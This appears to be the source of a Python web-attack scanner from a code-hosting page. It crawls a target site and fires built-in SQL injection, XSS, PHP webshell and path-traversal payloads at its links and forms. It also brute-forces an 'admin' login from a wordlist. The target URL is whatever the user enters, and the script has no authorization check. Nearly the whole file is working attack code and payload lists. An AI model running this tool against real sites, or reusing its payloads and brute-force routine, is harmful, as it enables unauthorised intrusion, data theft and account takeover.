-
Notifications
You must be signed in to change notification settings - Fork 0
/
progress.py
282 lines (229 loc) · 9.86 KB
/
progress.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
import requests
from bs4 import BeautifulSoup
import re
import urllib.parse
import time
from selenium import webdriver
from tqdm import tqdm # For progress bar
import os
def display_name():
    """Print the tool's ANSI-colored ASCII-art banner and tool name to stdout."""
    # Banner art: \033[32m switches to green, \033[0m resets the terminal color.
    name_art = """
\033[32m
█████╗ ███████╗ █████╗ ██████╗ ██╗███╗ ██╗███████╗
██╔══██╗██╔════╝██╔══██╗██╔══██╗██║████╗ ██║██╔════╝
███████║███████╗███████║██████╔╝██║██╔██╗ ██║███████╗
██╔══██║╚════██║██╔══██║██╔══██╗██║██║╚██╗██║╚════██║
██║ ██║███████║██║ ██║██║ ██║██║██║ ╚████║███████║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝
Developed by: asadinf\033[0m
"""
    # \033[36m is cyan.
    tool_name = "\033[36mTool Name: web\033[0m"
    print(name_art)
    print(tool_name)
# Module-level side effect: show the banner as soon as the script runs.
display_name()
def get_default_payloads():
    """Return the built-in payload lists as a 4-tuple.

    Returns:
        tuple[list[str], list[str], list[str], list[str]]:
            (sql, xss, rce, fuzz) payload lists, in that order.
    """
    sqli = [
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' OR '1'='1' /*",
        "' OR '1'='1' #",
        "' UNION SELECT NULL, NULL, NULL --",
        "' UNION SELECT 1, @@version, 3 --",
    ]
    xss = [
        "<script>alert('XSS')</script>",
        "'\"><img src=x onerror=alert(1)>",
        "<body onload=alert(1)>",
        "<svg/onload=alert(1)>",
        "<img src='x' onerror='alert(1)'>",
    ]
    rce = [
        "phpinfo();",
        "<?php system($_GET['cmd']); ?>",
        "<?php exec($_GET['cmd']); ?>",
        "<?php passthru($_GET['cmd']); ?>",
        "<?php shell_exec($_GET['cmd']); ?>",
    ]
    fuzz = [
        "../../../../../etc/passwd",
        "../../../../../../etc/passwd",
        "index.php?id=1' OR '1'='1",
        "index.php?id=1' AND sleep(5)--",
        "index.php?id=<script>alert(1)</script>",
    ]
    return sqli, xss, rce, fuzz
def find_links(url):
    """Fetch *url* and return the set of absolute links found in its anchors.

    Only links whose absolute form contains *url* as a substring are kept
    (a loose same-site filter).  On any error, reports it and returns an
    empty set.
    """
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, "html.parser")
        candidates = {
            urllib.parse.urljoin(url, anchor['href'])
            for anchor in soup.find_all('a', href=True)
        }
        return {link for link in candidates if url in link}
    except Exception as e:
        print(f"Error fetching links from {url}: {e}")
        return set()
def sql_injection_test(url, params, sql_payloads):
    """Send each SQL payload in each parameter of *url* and flag error hints.

    Detection is a naive substring check ("SQL" or "syntax" in the response
    body), so false positives and negatives are expected.
    NOTE(review): `break` only exits the inner parameter loop; the remaining
    payloads in the outer loop are still attempted.
    """
    vulnerable = False
    for payload in sql_payloads:
        for param in params:
            # Copy so the caller's params dict is never mutated.
            test_params = params.copy()
            test_params[param] = payload
            response = requests.get(url, params=test_params)
            if "SQL" in response.text or "syntax" in response.text:
                print(f"Possible SQL Injection vulnerability found with payload: {payload} on param: {param}")
                vulnerable = True
                break
    if not vulnerable:
        print("No SQL Injection vulnerabilities found.")
def xss_test(url, params, xss_payloads):
    """Send each XSS payload in each parameter of *url* and check for reflection.

    A parameter is flagged when the payload string appears verbatim in the
    response body (reflected-XSS heuristic; does not prove execution).
    NOTE(review): `break` only exits the inner parameter loop.
    """
    vulnerable = False
    for payload in xss_payloads:
        for param in params:
            # Copy so the caller's params dict is never mutated.
            test_params = params.copy()
            test_params[param] = payload
            response = requests.get(url, params=test_params)
            if payload in response.text:
                print(f"Possible XSS vulnerability found with payload: {payload} on param: {param}")
                vulnerable = True
                break
    if not vulnerable:
        print("No XSS vulnerabilities found.")
def rce_test(url, rce_payloads):
    """Append each RCE payload directly onto *url* and look for telltale output.

    Flags the URL when the response body contains "phpinfo" or "system" —
    a very loose heuristic (any page mentioning those words matches).
    NOTE(review): payloads are concatenated without URL-encoding or a
    separator; the payload must make sense appended raw to *url*.
    """
    vulnerable = False
    for payload in rce_payloads:
        response = requests.get(url + payload)
        if "phpinfo" in response.text or "system" in response.text:
            print(f"Possible Remote Code Execution vulnerability found with payload: {payload}")
            vulnerable = True
            break
    if not vulnerable:
        print("No Remote Code Execution vulnerabilities found.")
def analyze_headers(url):
    """Fetch *url* and report common security response headers that are absent."""
    headers = requests.get(url).headers
    # requests' header mapping is case-insensitive, so these names match
    # regardless of the server's capitalization.
    for required in ('X-Frame-Options',
                     'X-Content-Type-Options',
                     'Strict-Transport-Security'):
        if required not in headers:
            print(f"{required} header missing on {url}")
def form_analysis(url):
    """Find HTML forms on *url* and run the SQLi/XSS tests over their inputs.

    For each <form>, builds a {input-name: value} dict (default value 'test')
    and submits it via GET to the form's resolved action URL.
    NOTE(review): depends on module-level globals `sql_payloads` and
    `xss_payloads` (assigned only in the __main__ block); calling this
    before they exist raises NameError, which the broad except below
    would swallow as a printed error.
    """
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, "html.parser")
        for form in soup.find_all('form'):
            action = form.get('action')
            # Method is reported but not used: tests below always use GET.
            method = form.get('method', 'get').lower()
            inputs = form.find_all('input')
            form_url = urllib.parse.urljoin(url, action)
            print(f"Form found on {form_url} with method {method.upper()}")
            form_data = {}
            for inp in inputs:
                name = inp.get('name')
                value = inp.get('value', 'test')
                if name:
                    form_data[name] = value
            sql_injection_test(form_url, form_data, sql_payloads)
            xss_test(form_url, form_data, xss_payloads)
    except Exception as e:
        print(f"Error analyzing forms on {url}: {e}")
def brute_force_login(url, username_param, password_param, wordlist):
    """POST each password from the *wordlist* file to *url* until one succeeds.

    The username is hard-coded to 'admin'; success is detected by the
    literal marker "Login Successful" in the response body, so sites with
    any other success indicator are never reported as cracked.
    """
    with open(wordlist, 'r') as file:
        passwords = file.readlines()
    for password in passwords:
        password = password.strip()
        data = {
            username_param: 'admin',
            password_param: password
        }
        response = requests.post(url, data=data)
        if "Login Successful" in response.text:
            print(f"Login successful with password: {password}")
            break
        else:
            print(f"Attempted with password: {password}")
def deep_crawl_with_selenium(url):
    """Render *url* in Firefox via Selenium and collect same-site links from the DOM.

    Unlike find_links(), this sees links added by JavaScript, at the cost of
    launching a real browser.
    NOTE(review): driver.quit() is not in a try/finally, so an exception
    while fetching or parsing leaks the browser process.
    """
    driver = webdriver.Firefox()
    driver.get(url)
    # Fixed wait for JS-driven content; no explicit readiness check.
    time.sleep(3)
    page_source = driver.page_source
    soup = BeautifulSoup(page_source, 'html.parser')
    links = set()
    for a_tag in soup.find_all('a', href=True):
        link = urllib.parse.urljoin(url, a_tag['href'])
        # Loose same-site filter: substring match, not an origin comparison.
        if url in link:
            links.add(link)
    driver.quit()
    return links
def parameter_fuzzing(url, params, fuzz_payloads):
    """Substitute each fuzz payload into each parameter and check for reflection.

    Same reflection heuristic as xss_test(): a hit means the payload string
    came back verbatim in the response body.  With an empty *params* dict
    (as scan_website currently passes) the inner loop never runs and no
    requests are made.
    """
    vulnerable = False
    for payload in fuzz_payloads:
        for param in params:
            # Copy so the caller's params dict is never mutated.
            test_params = params.copy()
            test_params[param] = payload
            response = requests.get(url, params=test_params)
            if payload in response.text:
                print(f"Parameter fuzzing found possible vulnerability with payload: {payload} on param: {param}")
                vulnerable = True
    if not vulnerable:
        print("No vulnerabilities found with parameter fuzzing.")
def scan_website(url, sql_payloads, xss_payloads, rce_payloads, fuzz_payloads, wordlist=None):
    """Crawl *url* (static + Selenium), save links, then run every check per link.

    Writes <domain>_all_urls.txt with the discovered links.
    NOTE(review): <domain>_all_usernames_mail.txt and
    <domain>_vulnerabilities.txt are opened (truncated) but never written —
    all findings go to stdout only.  sql_payloads/xss_payloads parameters
    are unused here; form_analysis() picks them up as globals instead.
    """
    # e.g. "example.com" -> "example_com" for safe filenames.
    domain_name = urllib.parse.urlparse(url).netloc.replace('.', '_')
    urls_file = f"{domain_name}_all_urls.txt"
    usernames_file = f"{domain_name}_all_usernames_mail.txt"
    vulnerabilities_file = f"{domain_name}_vulnerabilities.txt"
    links = find_links(url)
    deep_links = deep_crawl_with_selenium(url)
    links.update(deep_links)
    with open(urls_file, 'w') as file:
        for link in tqdm(links, desc="Saving URLs"):
            file.write(link + '\n')
    if wordlist:
        with open(usernames_file, 'w') as file:
            print("Starting brute force attack...")
            brute_force_login(url, 'username', 'password', wordlist)
            # Add brute force results to the file if needed
    with open(vulnerabilities_file, 'w') as file:
        for link in tqdm(links, desc="Scanning Links"):
            print(f"Scanning {link} ...")
            analyze_headers(link)
            form_analysis(link)
            rce_test(link, rce_payloads)
            parameter_fuzzing(link, {}, fuzz_payloads)  # You need to modify this based on your needs
            # Throttle between targets.
            time.sleep(1)
    print("Scan completed.")
if __name__ == "__main__":
    # Interactive entry point: prompt for the target URL and optional
    # wordlist/payload files, then launch the scan.
    website_url = input("Enter the website URL (e.g., https://google.com): ")
    wordlist_path = input("Enter the path to the wordlist for brute force (leave blank to skip): ")
    sql_payloads_file = input("Enter path to SQL payloads file (leave blank to use default): ")
    xss_payloads_file = input("Enter path to XSS payloads file (leave blank to use default): ")
    rce_payloads_file = input("Enter path to RCE payloads file (leave blank to use default): ")
    fuzz_payloads_file = input("Enter path to Fuzzing payloads file (leave blank to use default): ")
    # Default-fallback dance: if no SQL file is given, ALL four defaults are
    # loaded at once; the later `in locals()` guards then skip reloading.
    # If a SQL file IS given, each other list falls back individually.
    if sql_payloads_file:
        with open(sql_payloads_file, 'r') as file:
            sql_payloads = [line.strip() for line in file]
    else:
        sql_payloads, xss_payloads, rce_payloads, fuzz_payloads = get_default_payloads()
    if xss_payloads_file:
        with open(xss_payloads_file, 'r') as file:
            xss_payloads = [line.strip() for line in file]
    else:
        # Only load the default if the bulk assignment above didn't run.
        if not 'xss_payloads' in locals():
            xss_payloads = get_default_payloads()[1]
    if rce_payloads_file:
        with open(rce_payloads_file, 'r') as file:
            rce_payloads = [line.strip() for line in file]
    else:
        if not 'rce_payloads' in locals():
            rce_payloads = get_default_payloads()[2]
    if fuzz_payloads_file:
        with open(fuzz_payloads_file, 'r') as file:
            fuzz_payloads = [line.strip() for line in file]
    else:
        if not 'fuzz_payloads' in locals():
            fuzz_payloads = get_default_payloads()[3]
    # Empty wordlist_path ("") is falsy, so scan_website skips brute force.
    scan_website(website_url, sql_payloads, xss_payloads, rce_payloads, fuzz_payloads, wordlist_path)